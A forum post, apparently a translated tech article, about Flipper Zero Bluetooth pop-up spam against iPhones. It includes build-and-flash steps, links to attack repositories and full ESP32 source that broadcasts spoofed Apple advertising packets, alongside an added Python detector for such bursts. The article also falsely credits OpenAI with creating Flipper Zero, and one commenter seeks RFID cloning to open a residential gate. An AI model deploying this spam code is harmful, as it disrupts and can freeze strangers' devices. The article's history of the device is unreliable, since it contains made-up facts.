eric_wang posted on 2023-12-25 16:59

Apple hit by a shocking vulnerability: hackers are targeting this feature


<section>Do you use an iPhone or an Android phone? Recently a cheap hacking device has been sweeping overseas markets: it can effortlessly harass your Apple devices from up to 50 meters away, and it sells for only 199 US dollars.</section>

<section>This time, Apple users are the victims once again.</section>

<section>
<strong>Hackers have their eye on your Bluetooth</strong>
</section>

<section>You may have run into this: you are on the subway, happily reading a novel or the news on your iPhone or iPad, when a pop-up suddenly appears saying &ldquo;Not Your AirPods&rdquo;. You dismiss it, and another pop-up immediately appears. At this point you just assume someone nearby is playing with an AirPods case.</section>

<section>But right after that, your iPhone/iPad shows not only the AirPods pop-up but also AirPods Pro, AirPods Max, Apple TV and Color Balance pop-ups.</section>

<section>That is when you realize a hacker has their eye on you and has launched a pop-up attack against your iPhone.</section>


<section>Image source: Bilibili uploader 月朗脑洞大</section>

<section>In fact, this goes back to September of this year.</section>

<section>According to 9to5Mac, Flipper Zero, a device built for hardware enthusiasts and billed as a &ldquo;toolbox for penetration testers and hobbyists&rdquo;, made its first appearance this September; code can be written to it so that it controls all kinds of protocols.</section>

<section>When a hacker loads Flipper Zero with specific code that exploits a flaw in the Bluetooth Low Energy (BLE) pairing sequence, the device can carry out a DoS attack, sending a flood of Bluetooth pop-ups to nearby iPhones and leaving the affected devices frozen for several minutes before they reboot.</section>

<section>Flipper Zero's Bluetooth radio range is reportedly about 164 feet (about 50 meters), so hackers usually launch the DoS attack from close by, causing serious disruption in coffee shops and at sporting events without being detected.</section>

<section>9to5Mac also noted that Apple has still not been able to fully fix the bug; the only thing users can do is disable Bluetooth in Settings. Apple has also not yet acknowledged the BLE pairing-sequence flaw that hackers are exploiting, and foreign media suggest &ldquo;the reason may be technical&rdquo;.</section>


<section>
<strong>Mission: Impossible, the hackers get hacked</strong>
</section>

<section>The story of Flipper Zero goes back to 2016, when cryptocurrency urgently needed a secure and reliable hardware solution for storing and using cryptographic keys. To meet that demand, OpenAI spent years developing a hardware security device, finally released in 2020: Flipper Zero.</section>

<section>Flipper Zero's design was inspired by the Cybernetic Dolphin from the cyberpunk film Johnny Mnemonic (a dolphin once technologically enhanced by the navy that ended up becoming a hacker); today it is the geek's Swiss Army knife and the hacker's Tamagotchi.</section>

<section>Because the product concept is so cool, Flipper Zero spreads by word of mouth and has won a large base of loyal users.</section>

<section>Alexander Kulagin, one of Flipper Zero's co-founders, said: &ldquo;One reason we succeeded in launching Flipper Zero is that today everyone wants to be a hacker, but not everyone knows how to become one. We wanted to show that hacking is actually something used every day; it is not something bad, just a set of skills like anything else.&rdquo;</section>


<section>Flipper Zero was conceived from the start for assessing and strengthening the security of electronic systems, so penetration testing, digital forensics and hardware hacking are its strong suits. It is also easy to obtain on overseas online shopping platforms.</section>


<section>What is rather absurd is that as the Flipper Zero community grew rapidly, the device was not only out of stock for a time, but criminals also began targeting this group with precise phishing attacks. This one is straight out of Mission: Impossible: the &ldquo;hackers&rdquo; themselves got taken.</section>

<section>Security researchers found three fake Flipper Zero Twitter (X) accounts and two fake FIFPER official stores on Twitter. The fake accounts used a capital &quot;I&quot; in their names, which looks like a lowercase &quot;l&quot; on Twitter, and they had no business verification either.</section>

<section>The fake Flipper Zero official store was not only more realistic than the real one, its prices also matched the real store. When a user chose to buy, they were redirected to a fake checkout page, again imitating the real store, asking for an e-mail address, name and shipping address. The moment you chose to pay, your money was obviously gone, and your personal information had leaked as well.</section>


<section>
<strong>How is this done?</strong>
</section>

<section>Back to the topic: how exactly is this kind of functionality achieved?</section>

<section>At the hardware level Flipper Zero is not complicated: a battery, USB, micro SD reader, buzzer, antenna, 125 kHz RFID reader and emulator, NFC reader and emulator, sub-1 GHz module, Bluetooth module, infrared module, vibration motor, 256 KB of RAM and iButton.</section>

<section>Most importantly, Flipper Zero supports a wide range of IoT protocols: it can emulate radio, NFC, RFID and other kinds of signals and test the communication functions of other devices. It can act as a remote control and copy access cards, but it can also become a &ldquo;hacking tool&rdquo;: cloning car keys, sending junk messages over Bluetooth, and even controlling access to important systems. Its hardware is 100% open source, and the official site provides the firmware source code, schematics, a cross-platform SDK and desktop &amp; mobile tools. You can modify and extend it however you like to achieve these unusual capabilities.</section>

<ul>
        <li>
        <section><strong>Sub-1 GHz transceiver</strong></section>
        </li>
</ul>


<section>For example garage door remotes, barriers, IoT sensors and remote keyless entry systems. Thanks to its integrated multi-band antenna and CC1101 chip, the effective range reaches 50 meters. The CC1101 is a general-purpose transceiver designed for very-low-power wireless applications. It supports several kinds of digital modulation, including 2-FSK, 4-FSK, GFSK and MSK, as well as OOK and flexible ASK shaping. You can implement any digital communication in your application, for instance connecting to IoT devices and access control systems.</section>


<ul>
        <li>
        <section><strong>125 kHz RFID</strong></section>
        </li>
</ul>

<section>The 125 kHz antenna sits at the bottom of Flipper Zero; it can read low-frequency proximity cards and save them to memory for later emulation, which opens some access control systems. That is because some early access control systems store only an N-byte ID and have no authentication mechanism, allowing anyone to read, clone and emulate the card.</section>


<ul>
        <li>
        <section><strong>High-frequency proximity cards</strong></section>
        </li>
</ul>

<section>Flipper Zero also has a built-in NFC module (13.56 MHz). Together with the 125 kHz RFID module, it turns Flipper Zero into the ultimate RFID device, operating in both the low-frequency (LF) and high-frequency (HF) ranges. The NFC module supports all major standards. It works almost the same way as the 125 kHz module, letting you interact with NFC-enabled devices: reading, writing and emulating HF tags.</section>


<ul>
        <li>
        <section><strong>Bluetooth</strong></section>
        </li>
</ul>

<section>As mentioned earlier, Flipper Zero can interact with the BLE protocol, more specifically by imitating or spoofing its advertising packets.</section>


<section>When a device like Flipper Zero imitates the advertising packets of a legitimate device or service, it can create a large number of virtual devices in the vicinity of iOS users. Imagine searching for a device to connect to and seeing a list of dozens, if not hundreds, of fake device names. Or trying AirDrop and being flooded with fake recipients.</section>

<section>Knowing this, how is it done on a Flipper Zero?</section>


<section>Update Flipper Zero by modifying the specific file responsible for the Bluetooth functionality, then compile and apply the firmware update.</section>

<section>First download the official firmware code:</section>

<pre>
<code>git clone <a href="https://github.com/flipperdevices/flipperzero-firmware.git" target="_blank">https://github.com/flipperdevices/flipperzero-firmware.git</a></code></pre>

<section>As an example, we use Apple AirTag here (the code has been updated on GitHub):</section>

<section><a href="https://github.com/h0e4a0r1t/FlipperZero_Annoying_Apple/" target="_blank">https://github.com/h0e4a0r1t/FlipperZero_Annoying_Apple/</a></section>

<section>Update the &ldquo;gap.c&rdquo; file, then compile the updated firmware:</section>

<pre>
<code>./fbt COMPACT=1 DEBUG=0 VERBOSE=1 updater_package</code></pre>


<section>The compiled firmware is in this folder.</section>

<section>Then use qFlipper and upload the compiled firmware via Install from file to perform the update.</section>

<section>After the update succeeds, open the Settings menu.</section>

<section>Open the Bluetooth option to configure Bluetooth.</section>

<section>Switch OFF to ON to turn on Bluetooth.</section>

<section>Nearby iPhones will receive the alerts.</section>

<section>Of course, it does not matter if you do not have a Flipper Zero: this is now an open-source GitHub project called &ldquo;evil applejuice&rdquo;; an ESP32 costing 10 yuan can be flashed with it, and you do not even need a dev board, an Android phone can emulate it. A Bilibili uploader has built this project with a modified Huaqiangbei promax ultra+.</section>

<section>Image source: Bilibili uploader 月朗脑洞大</section>

<section>Open-source repository: <a href="https://github.com/ckcr4lyf/EvilAppleJuice-ESP32" target="_blank">https://github.com/ckcr4lyf/EvilAppleJuice-ESP32</a></section>

<section>Part of the code:</section>

<section>
<pre>
<code>// This example takes heavy inspiration from the ESP32 example by ronaldstoner
// Based on the previous work of chipik / _hexway / ECTO-1A &amp; SAY-10
// See the README for more info
#include &lt;Arduino.h&gt;
#include &lt;BLEDevice.h&gt;
#include &lt;BLEUtils.h&gt;
#include &lt;BLEServer.h&gt;

BLEAdvertising *pAdvertising;  // global variable
uint32_t delayMilliseconds = 1000;

/*
These are audio devices: wireless headphones / earbuds
It seems these need a shorter range between ESP &amp; iDevice
Each entry is one complete 31-byte advertising payload.
*/
const uint8_t DEVICES[][31] = {
  // Airpods
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x02, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Airpods Pro
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0e, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Airpods Max
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0a, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Airpods Gen 2
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0f, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Airpods Gen 3
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x13, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Airpods Pro Gen 2
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x14, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Power Beats
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x03, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Power Beats Pro
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0b, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Beats Solo Pro
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0c, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Beats Studio Buds
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x11, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Beats Flex
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x10, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Beats X
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x05, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Beats Solo 3
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x06, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Beats Studio 3
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x09, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Beats Studio Pro
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x17, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Beats Fit Pro
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x12, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
  // Beats Studio Buds Plus
  {0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x16, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
};

/*
These are more general home devices
It seems these can work over long distances, especially AppleTV Setup
Each entry is one complete 23-byte advertising payload.
*/
const uint8_t SHORT_DEVICES[][23] = {
  // AppleTV Setup
  {0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x01, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
  // AppleTV Pair
  {0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x06, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
  // AppleTV New User
  {0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x20, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
  // AppleTV AppleID Setup
  {0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x2b, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
  // AppleTV Wireless Audio Sync
  {0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0xc0, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
  // AppleTV Homekit Setup
  {0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x0d, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
  // AppleTV Keyboard Setup
  {0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x13, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
  // AppleTV Connecting to Network
  {0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x27, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
  // Homepod Setup
  {0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x0b, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
  // Setup New Phone
  {0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x09, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
  // Transfer Number
  {0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x02, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
  // TV Color Balance
  {0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x1e, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
};

void setup() {
  Serial.begin(115200);
  Serial.println("Starting ESP32 BLE");

  BLEDevice::init("AirPods 69");

  // Create the BLE Server
  BLEServer *pServer = BLEDevice::createServer();
  pAdvertising = pServer-&gt;getAdvertising();

  // seems we need to init it with an address in setup() step.
  esp_bd_addr_t null_addr = {0xFE, 0xED, 0xC0, 0xFF, 0xEE, 0x69};
  pAdvertising-&gt;setDeviceAddress(null_addr, BLE_ADDR_TYPE_RANDOM);
}

void loop() {
  // First generate fake random MAC
  esp_bd_addr_t dummy_addr = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
  for (int i = 0; i &lt; 6; i++){
    dummy_addr[i] = random(256);

    // It seems for some reason first 4 bits
    // Need to be high (aka 0b1111), so we
    // OR with 0xF0
    //if (i == 0){
      //dummy_addr[0] |= 0xF0;
    //}
  }

  BLEAdvertisementData oAdvertisementData = BLEAdvertisementData();

  // Randomly pick data from one of the devices
  // First decide short or long
  // 0 = long (headphones), 1 = short (misc stuff like Apple TV)
  int device_choice = random(2);
  //int device_choice = 1;
  if (device_choice == 0){
    int index = random(17);  // 17 entries in DEVICES
    oAdvertisementData.addData(std::string((char*)DEVICES[index], 31));
  } else {
    int index = random(12);  // 12 entries in SHORT_DEVICES
    oAdvertisementData.addData(std::string((char*)SHORT_DEVICES[index], 23));
  }

  /*Page 191 of Apple's "Accessory Design Guidelines for Apple Devices (Release R20)" recommends to use only one of
    the three advertising PDU types when you want to connect to Apple devices.
        // 0 = ADV_TYPE_IND,
        // 1 = ADV_TYPE_SCAN_IND
        // 2 = ADV_TYPE_NONCONN_IND

    Randomly using any of these PDU types may increase detectability of spoofed packets.

    What we know for sure:
    - AirPods Gen 2: this advertises ADV_TYPE_SCAN_IND packets when the lid is opened and ADV_TYPE_NONCONN_IND when in pairing mode (when the rear case button is held).
                     Consider using only these PDU types if you want to target Airpods Gen 2 specifically.
  */

  int adv_type_choice = random(3);
  if (adv_type_choice == 0){
    pAdvertising-&gt;setAdvertisementType(ADV_TYPE_IND);
  } else if (adv_type_choice == 1){
    pAdvertising-&gt;setAdvertisementType(ADV_TYPE_SCAN_IND);
  } else {
    pAdvertising-&gt;setAdvertisementType(ADV_TYPE_NONCONN_IND);
  }

  // Set the device address, advertisement data
  pAdvertising-&gt;setDeviceAddress(dummy_addr, BLE_ADDR_TYPE_RANDOM);
  pAdvertising-&gt;setAdvertisementData(oAdvertisementData);

  // Set advertising interval
  /*According to Apple's Technical Q&amp;A QA1931 (https://developer.apple.com/library/archive/qa/qa1931/_index.html), Apple recommends
    an advertising interval of 20ms to developers who want to maximize the probability of their BLE accessories to be discovered by iOS.

    These lines of code fix the interval to 20ms. Enabling these MIGHT increase the effectiveness of the DoS. Note this has not undergone thorough testing.
  */

  //pAdvertising-&gt;setMinInterval(0x20);
  //pAdvertising-&gt;setMaxInterval(0x20);
  //pAdvertising-&gt;setMinPreferred(0x20);
  //pAdvertising-&gt;setMaxPreferred(0x20);

  // Start advertising
  Serial.println("Sending Advertisement...");
  pAdvertising-&gt;start();
  delay(delayMilliseconds); // delay for delayMilliseconds ms
  pAdvertising-&gt;stop();
}</code></pre>
</section>
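<section>Added example (Python; not code from the page, the EvilAppleJuice project or the Flipper Zero firmware): a parser for the advertising payloads shown in the tables above and a detector for the burst pattern the article describes. The parser walks the standard AD structures (length, type, data) and, inside Apple manufacturer-specific data (company ID 0x004C), the type/length/value messages documented by public Continuity reverse-engineering; the model and action bytes are labelled with the names from the table comments. The detector flags the spam signature rather than any single payload: many distinct random source addresses carrying pairing or nearby-action messages within a short window. The captured frames, the 10-second window and the threshold of 8 sources are constructed for the example and should be tuned against real captures from a BLE sniffer.</section>

```python
"""Parse Apple Continuity BLE advertisements and flag pop-up spam bursts.

Added example; not code from the page, the EvilAppleJuice project or the
Flipper Zero firmware. Frame data, window size and threshold are constructed
for the example.
"""
from dataclasses import dataclass
import struct

APPLE_COMPANY_ID = 0x004C
PROXIMITY_PAIRING = 0x07   # Continuity type behind the "Not Your AirPods" banner
NEARBY_ACTION = 0x0F       # Continuity type behind Apple TV setup / Transfer Number banners

# Model and action bytes, labelled as in the comments of the payload tables above (partial).
PAIRING_MODELS = {0x0220: "AirPods", 0x0E20: "AirPods Pro", 0x0A20: "AirPods Max",
                  0x0320: "Powerbeats", 0x1420: "AirPods Pro Gen 2"}
NEARBY_ACTIONS = {0x01: "AppleTV Setup", 0x02: "Transfer Number", 0x1E: "TV Color Balance"}


@dataclass(frozen=True)
class ContinuityMsg:
    msg_type: int
    label: str


def ad_structures(payload: bytes):
    """Yield (ad_type, data) pairs from a raw advertising payload (length, type, data...)."""
    i = 0
    while i < len(payload):
        length = payload[i]
        if length == 0:
            return                       # zero-length structure: the rest is padding
        if i + 1 + length > len(payload):
            raise ValueError("truncated AD structure")
        yield payload[i + 1], bytes(payload[i + 2:i + 1 + length])
        i += 1 + length


def parse_apple_continuity(payload: bytes) -> list:
    """Return Continuity messages found in Apple (0x004C) manufacturer-specific data."""
    msgs = []
    for ad_type, data in ad_structures(payload):
        if ad_type != 0xFF or len(data) < 2:
            continue
        if struct.unpack_from("<H", data, 0)[0] != APPLE_COMPANY_ID:
            continue
        j = 2
        while j + 2 <= len(data):        # Apple TLVs: type byte, length byte, value
            t, n = data[j], data[j + 1]
            value = data[j + 2:j + 2 + n]
            j += 2 + n
            if t == PROXIMITY_PAIRING and len(value) >= 3:
                model = (value[1] << 8) | value[2]   # status byte, then big-endian model id
                msgs.append(ContinuityMsg(t, PAIRING_MODELS.get(model, f"model 0x{model:04x}")))
            elif t == NEARBY_ACTION and len(value) >= 2:
                action = value[1]                    # flags byte, then action type
                msgs.append(ContinuityMsg(t, NEARBY_ACTIONS.get(action, f"action 0x{action:02x}")))
    return msgs


def detect_spam(frames, window_s=10.0, max_sources=8):
    """frames: iterable of (timestamp_s, source_addr, payload_bytes).

    Alerts when more than `max_sources` distinct source addresses carried Apple
    pairing or nearby-action messages inside any trailing window of `window_s`
    seconds. A real room has a handful of such sources; a spammer rotates a fresh
    random address every burst. Returns (alert, peak_distinct_sources, labels).
    """
    hits, labels = [], set()
    for ts, addr, payload in frames:
        msgs = parse_apple_continuity(bytes(payload))
        if msgs:
            hits.append((ts, addr))
            labels.update(m.label for m in msgs)
    hits.sort()
    peak = 0
    for k, (ts, _) in enumerate(hits):
        recent = {a for t, a in hits[:k + 1] if t >= ts - window_s}
        peak = max(peak, len(recent))
    return peak > max_sources, peak, labels


# Constructed sample frames; the two payloads follow the layout of the tables above.
AIRPODS = bytes([0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x02, 0x20, 0x75, 0xaa, 0x30,
                 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12] + [0x00] * 12)
TV_COLOR = bytes([0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05,
                  0xc1, 0x1e, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00])
# Two owners opening their AirPods cases: two stable addresses, a few frames each.
BENIGN = [(t, "d4:9a:20:aa:bb:01", AIRPODS) for t in (0.0, 0.5, 1.0)] + \
         [(t, "d4:9a:20:aa:bb:02", AIRPODS) for t in (2.0, 2.5)]
# Spammer: a new random address every second, alternating payload types.
SPAM = [(float(i), f"fe:ed:c0:ff:ee:{i:02x}", AIRPODS if i % 2 else TV_COLOR)
        for i in range(20)]

if __name__ == "__main__":
    for name, frames in (("benign", BENIGN), ("spam", SPAM)):
        alert, peak, labels = detect_spam(frames)
        print(f"{name}: alert={alert} peak_sources={peak} labels={sorted(labels)}")
```

<section>Feed it (timestamp, address, payload) tuples from a sniffer capture. The payload bytes are byte-for-byte identical to what legitimate accessories send, so content alone cannot separate the two; the distinct-source count over a window can, because a genuine environment rarely shows more than a handful of pairing sources in ten seconds while a spammer rotates a fresh random address with every burst.</section>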

<p><strong>No need to panic</strong></p>

<section>Compared with Flipper Zero's testing functions, more and more people are starting to use it as a &ldquo;crime tool&rdquo;. Still, there is no need to panic.</section>

<section>Several Amazon sites have now listed &ldquo;Flipper Zero&rdquo; as a banned product, on the grounds that it is a card-skimming device that can be used to open room door locks, unlock cars, intercept Bluetooth signals and access data on computers.</section>

<section>Apple also recently released the iOS 17.2 update; although it does not completely solve the problem, it mitigates the related vulnerability caused by Flipper Zero. After upgrading to iOS 17.2 the pop-ups still appear, but the attack's destructive impact is clearly reduced and it no longer causes lock-ups or crashes.</section>

<section>Domestic platforms banned this device a while ago, but the product can now be found again.</section>

<section>Some netizens also suggest that you can set your iPhone or iPad to only show pop-ups for trusted devices. (Ticking &ldquo;don't show for 24 hours&rdquo; has no effect, since every pop-up counts as connecting to a new device.)</section>

<section>If you are still not reassured, turning off Bluetooth is the best option. (It is also the only one.)</section>

<section>
<p><strong>References</strong></p>
</section>

<section>
<p>IT之家: Vulnerability disclosed two months ago and still unpatched; hacker tool Flipper Zero can still crash iPhone / iPad with Bluetooth pop-ups. 2023-11-20. https://www.ithome.com/0/733/641.htm</p>

<p>Bilibili: Annoying Apple users: the FlipperZero Bluetooth prank. https://www.bilibili.com/read/cv26449696/</p>

<p>Bilibili 月朗脑洞大: https://www.bilibili.com/video/BV1f64y157i2</p>

<p>Engadget: https://www.engadget.com/flipper-zero-tamagotchi-hacking-game-175949581.html</p>

<p>FreeBuf: This banned hacking gadget once drove Apple users to despair. 2023-12-19. <a data-linktype="2" href="https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&amp;mid=2651251433&amp;idx=1&amp;sn=d25ec5ecd860fe957a1de7b4836ecdda&amp;scene=21#wechat_redirect" ql-global="true" rel="noopener noreferrer nofollow" target="_blank">https://mp.weixin.qq.com/s/LFy8k2jxNLnhirgiFSnfHA</a></p>
</section>


吾妻思萌 posted on 2023-12-26 06:37

Looks fun; there just aren't any available domestically.

极限零 posted on 2023-12-26 09:25

<p>Bluetooth really does need replacing; it has been around too long, the data rate is low, and the protocol has been studied to death.</p>

<p>There is a good reason classified departments ban wireless.</p>

极限零 posted on 2023-12-26 10:11

<p>I looked at the open-source one; it can only pop up alerts on iPhones, there is no RFID cloning function, which is what I need for my compound's main gate.</p>

秦天qintian0303 posted on 2023-12-27 17:25

<p>Wireless still has to go through hardware, so anyone can take a look at it.</p>

MrCU204 posted on 2024-11-27 08:27

<p><span style="color:#003900;">I always keep Bluetooth off.</span></p>